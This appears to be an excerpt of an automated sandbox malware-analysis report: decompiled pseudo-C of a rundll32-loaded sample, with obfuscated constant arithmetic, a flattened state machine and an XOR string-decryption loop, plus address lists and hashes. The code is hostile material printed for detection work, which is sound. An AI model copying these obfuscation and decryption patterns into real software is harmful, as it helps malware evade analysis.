							E00354DAD(_v56, _v52,  *((intOrPtr*)(_t160 + 0x24)), _v48, _v16);
							_t161 = _t161 + 0x14;
							goto L4;
						}
					}
				}
				return _t133;
			}


























                                                                                                                      0x00346a28
                                                                                                                      0x00346a30
                                                                                                                      0x00346a37
                                                                                                                      0x00346a39
                                                                                                                      0x00346a3d
                                                                                                                      0x00346a45
                                                                                                                      0x00346a48
                                                                                                                      0x00346a4b
                                                                                                                      0x00346a52
                                                                                                                      0x00346a59
                                                                                                                      0x00346a60
                                                                                                                      0x00346a67
                                                                                                                      0x00346a75
                                                                                                                      0x00346a78
                                                                                                                      0x00346a7f
                                                                                                                      0x00346a86
                                                                                                                      0x00346a8d
                                                                                                                      0x00346a94
                                                                                                                      0x00346a9b
                                                                                                                      0x00346aa2
                                                                                                                      0x00346aa9
                                                                                                                      0x00346ab0
                                                                                                                      0x00346ab7
                                                                                                                      0x00346ac1
                                                                                                                      0x00346ac6
                                                                                                                      0x00346acb
                                                                                                                      0x00346ad2
                                                                                                                      0x00346ad9
                                                                                                                      0x00346ae0
                                                                                                                      0x00346aea
                                                                                                                      0x00346aed
                                                                                                                      0x00346af0
                                                                                                                      0x00346af7
                                                                                                                      0x00346afe
                                                                                                                      0x00346b05
                                                                                                                      0x00346b0c
                                                                                                                      0x00346b13
                                                                                                                      0x00346b1a
                                                                                                                      0x00346b21
                                                                                                                      0x00346b28
                                                                                                                      0x00346b2b
                                                                                                                      0x00346b32
                                                                                                                      0x00346b39
                                                                                                                      0x00346b3d
                                                                                                                      0x00346b44
                                                                                                                      0x00346b4b
                                                                                                                      0x00346b52
                                                                                                                      0x00346b59
                                                                                                                      0x00346b60
                                                                                                                      0x00346b67
                                                                                                                      0x00346b6e
                                                                                                                      0x00346b72
                                                                                                                      0x00346b79
                                                                                                                      0x00346b80
                                                                                                                      0x00346b87
                                                                                                                      0x00346b8e
                                                                                                                      0x00346b95
                                                                                                                      0x00346b9c
                                                                                                                      0x00346ba0
                                                                                                                      0x00346ba7
                                                                                                                      0x00346c18
                                                                                                                      0x00346c18
                                                                                                                      0x00346c1c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00346bb4
                                                                                                                      0x00346bff
                                                                                                                      0x00346c05
                                                                                                                      0x00346c10
                                                                                                                      0x00346c15
                                                                                                                      0x00346bb6
                                                                                                                      0x00346bc1
                                                                                                                      0x00346bcb
                                                                                                                      0x00346c25
                                                                                                                      0x00346bcd
                                                                                                                      0x00346bd4
                                                                                                                      0x00346be3
                                                                                                                      0x00346bf7
                                                                                                                      0x00346bfc
                                                                                                                      0x00000000
                                                                                                                      0x00346bfc
                                                                                                                      0x00346bcb
                                                                                                                      0x00346bb4
                                                                                                                      0x00346c24

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ?.$UGX
                                                                                                                      • API String ID: 0-3695597265
                                                                                                                      • Opcode ID: 98ddda2cffde31070f97ce88449be83d194263a009fd023fdc502495e24e1397
                                                                                                                      • Instruction ID: c782ebab07bf12a2333e5166fa068ee3e3866fd4179d1fa5f564ea3e11f14bdf
                                                                                                                      • Opcode Fuzzy Hash: 98ddda2cffde31070f97ce88449be83d194263a009fd023fdc502495e24e1397
                                                                                                                      • Instruction Fuzzy Hash: 9E511172D01309EBCB59CFA5D98A9DEBFB2FF48318F208059D502BA260D7B51A45CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003444FA Relevance: 2.6, Strings: 2, Instructions: 122COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E003444FA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* _t110;
				signed int _t116;
				signed int _t120;
				void* _t126;
				signed int _t135;
				signed int _t136;
				void* _t138;
				signed int* _t141;

				_push(_a12);
				_t138 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t110);
				_v584 = 0x353aee;
				_t141 =  &(( &_v596)[5]);
				_t126 = 0x2b8a3ea;
				_t135 = 0x6c;
				_v584 = _v584 * 0x28;
				_v584 = _v584 | 0xfff7ffbb;
				_v584 = _v584 ^ 0xfff7ffab;
				_v560 = 0x47639d;
				_v560 = _v560 + 0xffffee4d;
				_v560 = _v560 ^ 0x00482f45;
				_v568 = 0x9954f4;
				_v568 = _v568 >> 4;
				_v568 = _v568 << 0xe;
				_v568 = _v568 ^ 0x655e48ca;
				_v572 = 0x27eb8;
				_v572 = _v572 << 0xf;
				_v572 = _v572 | 0x08d3f6f7;
				_v572 = _v572 ^ 0x4e414fab;
				_v572 = _v572 ^ 0x7197c1a5;
				_v592 = 0xd88b27;
				_v592 = _v592 | 0xcb2a0632;
				_v592 = _v592 ^ 0x61d9313a;
				_v592 = _v592 * 0x31;
				_v592 = _v592 ^ 0x90d0f268;
				_v564 = 0x1e6f95;
				_v564 = _v564 + 0xffffd458;
				_v564 = _v564 ^ 0x0016c965;
				_v556 = 0x7ec301;
				_v556 = _v556 / _t135;
				_v556 = _v556 ^ 0x0008e3f1;
				_v576 = 0xe82a72;
				_v576 = _v576 >> 7;
				_t116 = _v576;
				_t136 = 0x3f;
				_t134 = _t116 % _t136;
				_v576 = _t116 / _t136;
				_v576 = _v576 * 0x66;
				_v576 = _v576 ^ 0x00094998;
				_v596 = 0x9d9cf;
				_v596 = _v596 + 0xffff3374;
				_v596 = _v596 ^ 0xdf943dc0;
				_v596 = _v596 ^ 0x9d51af04;
				_v596 = _v596 ^ 0x42c0e9a6;
				_v580 = 0x1688bd;
				_v580 = _v580 >> 0xa;
				_v580 = _v580 + 0xf36b;
				_v580 = _v580 * 0x11;
				_v580 = _v580 ^ 0x001dff3c;
				_v588 = 0xc39d29;
				_v588 = _v588 + 0xc15a;
				_t120 = _v588 * 0x65;
				_v588 = _t120;
				_v588 = _v588 << 0x10;
				_v588 = _v588 ^ 0x49a37055;
				do {
					while(_t126 != 0x10fdd0e) {
						if(_t126 == 0x1b35a13) {
							return E00359045(_v596, _t134,  &_v520, _t138,  &_v552, _v580, _v588);
						}
						if(_t126 != 0x2b8a3ea) {
							goto L6;
						}
						_t134 =  &_v552;
						_t120 = E00361310(_v584,  &_v552, _v560, _v568, _v572, _v592);
						_t141 =  &(_t141[4]);
						_t126 = 0x10fdd0e;
					}
					_push(_t126);
					_t134 =  &_v520;
					_t120 = E0034AC8C(_v564,  &_v520, _v556, _v576);
					_t141 =  &(_t141[3]);
					_t126 = 0x1b35a13;
					L6:
				} while (_t126 != 0x712552c);
				return _t120;
			}
























                                                                                                                      0x00344504
                                                                                                                      0x0034450b
                                                                                                                      0x0034450d
                                                                                                                      0x00344514
                                                                                                                      0x0034451b
                                                                                                                      0x0034451c
                                                                                                                      0x0034451d
                                                                                                                      0x00344522
                                                                                                                      0x0034452a
                                                                                                                      0x0034453e
                                                                                                                      0x00344542
                                                                                                                      0x00344543
                                                                                                                      0x00344547
                                                                                                                      0x0034454f
                                                                                                                      0x00344557
                                                                                                                      0x0034455f
                                                                                                                      0x00344567
                                                                                                                      0x0034456f
                                                                                                                      0x00344577
                                                                                                                      0x0034457c
                                                                                                                      0x00344581
                                                                                                                      0x00344589
                                                                                                                      0x00344591
                                                                                                                      0x00344596
                                                                                                                      0x0034459e
                                                                                                                      0x003445a6
                                                                                                                      0x003445ae
                                                                                                                      0x003445b6
                                                                                                                      0x003445be
                                                                                                                      0x003445cd
                                                                                                                      0x003445d1
                                                                                                                      0x003445d9
                                                                                                                      0x003445e1
                                                                                                                      0x003445e9
                                                                                                                      0x003445f1
                                                                                                                      0x00344601
                                                                                                                      0x00344605
                                                                                                                      0x0034460d
                                                                                                                      0x00344615
                                                                                                                      0x0034461a
                                                                                                                      0x0034461e
                                                                                                                      0x0034461f
                                                                                                                      0x00344626
                                                                                                                      0x0034462f
                                                                                                                      0x00344633
                                                                                                                      0x0034463b
                                                                                                                      0x00344643
                                                                                                                      0x0034464b
                                                                                                                      0x00344653
                                                                                                                      0x0034465b
                                                                                                                      0x00344663
                                                                                                                      0x0034466b
                                                                                                                      0x00344670
                                                                                                                      0x0034467d
                                                                                                                      0x00344681
                                                                                                                      0x00344689
                                                                                                                      0x00344691
                                                                                                                      0x00344699
                                                                                                                      0x0034469e
                                                                                                                      0x003446a2
                                                                                                                      0x003446a7
                                                                                                                      0x003446af
                                                                                                                      0x003446af
                                                                                                                      0x003446b5
                                                                                                                      0x00000000
                                                                                                                      0x00344720
                                                                                                                      0x003446b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003446bf
                                                                                                                      0x003446d3
                                                                                                                      0x003446d8
                                                                                                                      0x003446db
                                                                                                                      0x003446db
                                                                                                                      0x003446df
                                                                                                                      0x003446e4
                                                                                                                      0x003446f0
                                                                                                                      0x003446f5
                                                                                                                      0x003446f8
                                                                                                                      0x003446fa
                                                                                                                      0x003446fa
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E/H$r*
                                                                                                                      • API String ID: 0-2167228428
                                                                                                                      • Opcode ID: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction ID: 76538e3349df41e2eca877672b6d78042ed14e1399c99fa54ba9a1c9f7b69877
                                                                                                                      • Opcode Fuzzy Hash: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction Fuzzy Hash: 1E5141714083419FC749DF21C98A81FBBE1FBD8748F505A1DF09AAA221D7B19A49CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00361993 Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00361993(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t120;
				signed int _t126;
				signed int _t127;
				intOrPtr _t138;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(0x104);
				_v68 = 0x5658b2;
				_t138 = 0;
				_v64 = 0x871b59;
				_v60 = 0xa8976a;
				_v56 = 0;
				_v40 = 0xee5304;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x00002b94;
				_v24 = 0xe2229b;
				_v24 = _v24 >> 2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xe22b2fd9;
				_v8 = 0x13a34a;
				_t126 = 0x7b;
				_v8 = _v8 * 0x58;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x01172ec8;
				_v16 = 0x4f354;
				_t127 = 0x1c;
				_v16 = _v16 / _t126;
				_v16 = _v16 | 0x38cda962;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x66d4d439;
				_v12 = 0x949837;
				_v12 = _v12 ^ 0x28b93813;
				_v12 = _v12 + 0xffff414d;
				_v12 = _v12 + 0xcc4e;
				_v12 = _v12 ^ 0x282f8cad;
				_v44 = 0x4b103d;
				_v44 = _v44 + 0xffffdccd;
				_v44 = _v44 ^ 0x0043fba2;
				_v28 = 0xbeb96;
				_v28 = _v28 + 0xffffd9aa;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 ^ 0x000a38bb;
				_v48 = 0xb1bdc9;
				_v48 = _v48 + 0x24fd;
				_v48 = _v48 ^ 0x00b0c363;
				_v36 = 0x53e429;
				_v36 = _v36 + 0xffff530c;
				_v36 = _v36 / _t127;
				_v36 = _v36 ^ 0x0005d2bf;
				_v20 = 0xb0734b;
				_v20 = _v20 | 0x98e9e8ae;
				_v20 = _v20 + 0x857e;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0xc7d86034;
				_v32 = 0x655a5c;
				_v32 = _v32 >> 8;
				_v32 = _v32 | 0x0e60c7ff;
				_v32 = _v32 ^ 0x0e677ecd;
				_t120 = E00353C1B(_t127, _a16, _v40);
				_t137 = _t120;
				if(_t120 != 0) {
					_t138 = E00351785(_a4, _v16, _v12, _t127, _v44, _t137, _v28,  &_v52);
					E00354DAD(_v48, _v36, _t137, _v20, _v32);
				}
				return _t138;
			}























                                                                                                                      0x0036199b
                                                                                                                      0x003619a3
                                                                                                                      0x003619a6
                                                                                                                      0x003619a9
                                                                                                                      0x003619aa
                                                                                                                      0x003619ad
                                                                                                                      0x003619ae
                                                                                                                      0x003619af
                                                                                                                      0x003619b4
                                                                                                                      0x003619bb
                                                                                                                      0x003619bd
                                                                                                                      0x003619c7
                                                                                                                      0x003619d0
                                                                                                                      0x003619d3
                                                                                                                      0x003619da
                                                                                                                      0x003619de
                                                                                                                      0x003619e5
                                                                                                                      0x003619ec
                                                                                                                      0x003619f0
                                                                                                                      0x003619f4
                                                                                                                      0x003619fb
                                                                                                                      0x00361a08
                                                                                                                      0x00361a0b
                                                                                                                      0x00361a12
                                                                                                                      0x00361a15
                                                                                                                      0x00361a19
                                                                                                                      0x00361a20
                                                                                                                      0x00361a2c
                                                                                                                      0x00361a2d
                                                                                                                      0x00361a32
                                                                                                                      0x00361a39
                                                                                                                      0x00361a3d
                                                                                                                      0x00361a44
                                                                                                                      0x00361a4b
                                                                                                                      0x00361a52
                                                                                                                      0x00361a59
                                                                                                                      0x00361a60
                                                                                                                      0x00361a67
                                                                                                                      0x00361a6e
                                                                                                                      0x00361a75
                                                                                                                      0x00361a7c
                                                                                                                      0x00361a83
                                                                                                                      0x00361a8a
                                                                                                                      0x00361a8e
                                                                                                                      0x00361a95
                                                                                                                      0x00361a9c
                                                                                                                      0x00361aa3
                                                                                                                      0x00361aaa
                                                                                                                      0x00361ab1
                                                                                                                      0x00361abd
                                                                                                                      0x00361ac0
                                                                                                                      0x00361ac7
                                                                                                                      0x00361ace
                                                                                                                      0x00361ad5
                                                                                                                      0x00361adc
                                                                                                                      0x00361ae0
                                                                                                                      0x00361ae7
                                                                                                                      0x00361aee
                                                                                                                      0x00361af2
                                                                                                                      0x00361af9
                                                                                                                      0x00361b0d
                                                                                                                      0x00361b15
                                                                                                                      0x00361b19
                                                                                                                      0x00361b38
                                                                                                                      0x00361b44
                                                                                                                      0x00361b49
                                                                                                                      0x00361b53

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )S$\Ze
                                                                                                                      • API String ID: 0-2852868822
                                                                                                                      • Opcode ID: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction ID: 1a518f1fda006ab990e831ac6497bb886b3e5d308e9f057727be1adfe564d674
                                                                                                                      • Opcode Fuzzy Hash: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction Fuzzy Hash: E35103B1C00209EBCF49CFE9D98A8DEFBB1FB48704F108159E511B6220D3B55A59CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034BB4B Relevance: 2.6, Strings: 2, Instructions: 91COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0034BB4B(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t50;
				signed int _t52;
				unsigned int* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t75;
				unsigned int _t76;
				unsigned int _t77;
				unsigned int* _t80;
				signed int* _t81;
				signed int* _t82;
				unsigned int _t84;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_push( *((intOrPtr*)(_t94 + 0x18)));
				_push( *(_t94 + 0x24));
				_push(__ecx);
				_t50 = E0034CF25( *((intOrPtr*)(_t94 + 0x18)));
				 *(_t94 + 0x20) = 0xfe2925;
				_t4 =  &(_t50[1]); // 0x4
				_t81 = _t4;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x7128;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0x09a7dad2;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0xffff7390;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09fc0087;
				 *(_t94 + 0x1c) = 0x6df10d;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) << 0xa;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0xffff9bae;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0x6e9b;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) ^ 0xb7c65291;
				 *(_t94 + 0x34) = 0x26c28e;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x9999;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x5997;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x3e8;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0x0028604d;
				_t68 =  *_t50;
				_t82 =  &(_t81[1]);
				_t52 =  *_t81 ^ _t68;
				 *(_t94 + 0x24) = _t68;
				 *(_t94 + 0x28) = _t52;
				_t33 = _t52 + 1; // 0x1
				_t84 =  !=  ? (_t33 & 0xfffffffc) + 4 : _t33;
				_t95 = _t94 + 8;
				_t65 = E00353512(_t84);
				 *(_t95 + 0x2c) = _t65;
				if(_t65 != 0) {
					_t92 = 0;
					_t80 = _t65;
					_t90 =  >  ? 0 :  &(_t82[_t84 >> 2]) - _t82 + 3 >> 2;
					if(_t90 != 0) {
						_t66 =  *(_t95 + 0x18);
						do {
							_t75 =  *_t82;
							_t82 =  &(_t82[1]);
							_t76 = _t75 ^ _t66;
							 *_t80 = _t76;
							_t80 =  &(_t80[1]);
							_t77 = _t76 >> 0x10;
							 *((char*)(_t80 - 3)) = _t76 >> 8;
							 *(_t80 - 2) = _t77;
							_t92 = _t92 + 1;
							 *((char*)(_t80 - 1)) = _t77 >> 8;
						} while (_t92 < _t90);
						_t65 =  *(_t95 + 0x28);
					}
					 *((char*)(_t65 +  *((intOrPtr*)(_t95 + 0x1c)))) = 0;
				}
				return _t65;
			}



















                                                                                                                      0x0034bb55
                                                                                                                      0x0034bb56
                                                                                                                      0x0034bb5b
                                                                                                                      0x0034bb5c
                                                                                                                      0x0034bb61
                                                                                                                      0x0034bb69
                                                                                                                      0x0034bb69
                                                                                                                      0x0034bb6c
                                                                                                                      0x0034bb74
                                                                                                                      0x0034bb7c
                                                                                                                      0x0034bb84
                                                                                                                      0x0034bb8c
                                                                                                                      0x0034bb94
                                                                                                                      0x0034bb99
                                                                                                                      0x0034bba1
                                                                                                                      0x0034bba9
                                                                                                                      0x0034bbb1
                                                                                                                      0x0034bbb9
                                                                                                                      0x0034bbc1
                                                                                                                      0x0034bbc9
                                                                                                                      0x0034bbd1
                                                                                                                      0x0034bbd9
                                                                                                                      0x0034bbdd
                                                                                                                      0x0034bbe0
                                                                                                                      0x0034bbe2
                                                                                                                      0x0034bbe6
                                                                                                                      0x0034bbea
                                                                                                                      0x0034bbfa
                                                                                                                      0x0034bc05
                                                                                                                      0x0034bc13
                                                                                                                      0x0034bc15
                                                                                                                      0x0034bc1d
                                                                                                                      0x0034bc25
                                                                                                                      0x0034bc27
                                                                                                                      0x0034bc38
                                                                                                                      0x0034bc3d
                                                                                                                      0x0034bc3f
                                                                                                                      0x0034bc43
                                                                                                                      0x0034bc43
                                                                                                                      0x0034bc45
                                                                                                                      0x0034bc48
                                                                                                                      0x0034bc4a
                                                                                                                      0x0034bc51
                                                                                                                      0x0034bc54
                                                                                                                      0x0034bc57
                                                                                                                      0x0034bc5a
                                                                                                                      0x0034bc60
                                                                                                                      0x0034bc61
                                                                                                                      0x0034bc64
                                                                                                                      0x0034bc68
                                                                                                                      0x0034bc68
                                                                                                                      0x0034bc71
                                                                                                                      0x0034bc71
                                                                                                                      0x0034bc7d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (q$M`(
                                                                                                                      • API String ID: 0-2580875808
                                                                                                                      • Opcode ID: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction ID: 84a50e8b692fbb3ceea497525d7a14618e288837bf6162007c63e146fa5db171
                                                                                                                      • Opcode Fuzzy Hash: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction Fuzzy Hash: 0F319972A0A3418FD345CF18C88441AFBE0FF98718F414A5CF8899B241DB74EE09CB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034F154 Relevance: 2.6, Strings: 2, Instructions: 90COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0034F154(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v576;
				void* _t83;
				intOrPtr* _t85;
				signed int _t89;

				_v56 = 0xd50633;
				_v52 = 0xe1ee45;
				_v44 = 0;
				_v48 = 0;
				_v24 = 0xad73ca;
				_v24 = _v24 ^ 0x73620612;
				_v24 = _v24 ^ 0x73c7a99a;
				_v32 = 0x597259;
				_t89 = 0x52;
				_push(_t89);
				_v32 = _v32 / _t89;
				_v32 = _v32 ^ 0x0009f267;
				_v20 = 0xd3cfac;
				_v20 = _v20 << 9;
				_v20 = _v20 | 0x4896bc35;
				_v20 = _v20 ^ 0xef9372aa;
				_v28 = 0xdbc61e;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x01b432fd;
				_v16 = 0x90d5a3;
				_v16 = _v16 + 0xffffb729;
				_v16 = _v16 + 0xffff3d25;
				_v16 = _v16 ^ 0x0089c5ce;
				_v8 = 0xd44b29;
				_v8 = _v8 + 0x631b;
				_v8 = _v8 | 0x8b07e3a3;
				_v8 = _v8 * 0x62;
				_v8 = _v8 ^ 0x88a24378;
				_v12 = 0x36955e;
				_v12 = _v12 + 0xb114;
				_v12 = _v12 + 0xffffe207;
				_v12 = _v12 ^ 0x0030a900;
				_v36 = 0x9daa5e;
				_v36 = _v36 + 0xffffbce6;
				_v36 = _v36 ^ 0x0093fbb5;
				_v40 = 0x60d009;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x003d09ba;
				_t96 = _v24;
				_t83 = E00345C03( &_v576, _v24, _v32);
				_pop(0);
				if(_t83 != 0) {
					_t85 =  &_v576;
					if(_v576 != 0) {
						while( *_t85 != 0x5c) {
							_t85 = _t85 + 2;
							if( *_t85 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t85 + 2)) = 0;
					}
					L6:
					_push(0);
					_push(0);
					E0034884A(_v20, _t96, _v28, _v16, 0, _v8, 0, _v12,  &_v576, _v36, 0,  &_v44, _v40);
				}
				return _v44;
			}




















                                                                                                                      0x0034f15d
                                                                                                                      0x0034f166
                                                                                                                      0x0034f170
                                                                                                                      0x0034f173
                                                                                                                      0x0034f176
                                                                                                                      0x0034f17d
                                                                                                                      0x0034f184
                                                                                                                      0x0034f18b
                                                                                                                      0x0034f197
                                                                                                                      0x0034f19a
                                                                                                                      0x0034f19b
                                                                                                                      0x0034f1a4
                                                                                                                      0x0034f1ab
                                                                                                                      0x0034f1b2
                                                                                                                      0x0034f1b6
                                                                                                                      0x0034f1bd
                                                                                                                      0x0034f1c4
                                                                                                                      0x0034f1cb
                                                                                                                      0x0034f1ce
                                                                                                                      0x0034f1d5
                                                                                                                      0x0034f1dc
                                                                                                                      0x0034f1e3
                                                                                                                      0x0034f1ea
                                                                                                                      0x0034f1f1
                                                                                                                      0x0034f1f8
                                                                                                                      0x0034f1ff
                                                                                                                      0x0034f20a
                                                                                                                      0x0034f20d
                                                                                                                      0x0034f214
                                                                                                                      0x0034f21b
                                                                                                                      0x0034f222
                                                                                                                      0x0034f229
                                                                                                                      0x0034f230
                                                                                                                      0x0034f237
                                                                                                                      0x0034f23e
                                                                                                                      0x0034f245
                                                                                                                      0x0034f24c
                                                                                                                      0x0034f24f
                                                                                                                      0x0034f259
                                                                                                                      0x0034f25c
                                                                                                                      0x0034f262
                                                                                                                      0x0034f265
                                                                                                                      0x0034f267
                                                                                                                      0x0034f274
                                                                                                                      0x0034f276
                                                                                                                      0x0034f27c
                                                                                                                      0x0034f282
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034f284
                                                                                                                      0x00000000
                                                                                                                      0x0034f282
                                                                                                                      0x0034f288
                                                                                                                      0x0034f288
                                                                                                                      0x0034f28c
                                                                                                                      0x0034f28c
                                                                                                                      0x0034f28d
                                                                                                                      0x0034f2b1
                                                                                                                      0x0034f2b6
                                                                                                                      0x0034f2c0

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E$YrY
                                                                                                                      • API String ID: 0-1711274510
                                                                                                                      • Opcode ID: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction ID: ee260152eeea39c3354d069ff8cf00b1346f993247e7b4d84b960d8441d7730b
                                                                                                                      • Opcode Fuzzy Hash: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction Fuzzy Hash: 0841F276C0121EAFCF19CFE4C84A9EEBBB4FB04304F108199D411B62A0E3B51A44DF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
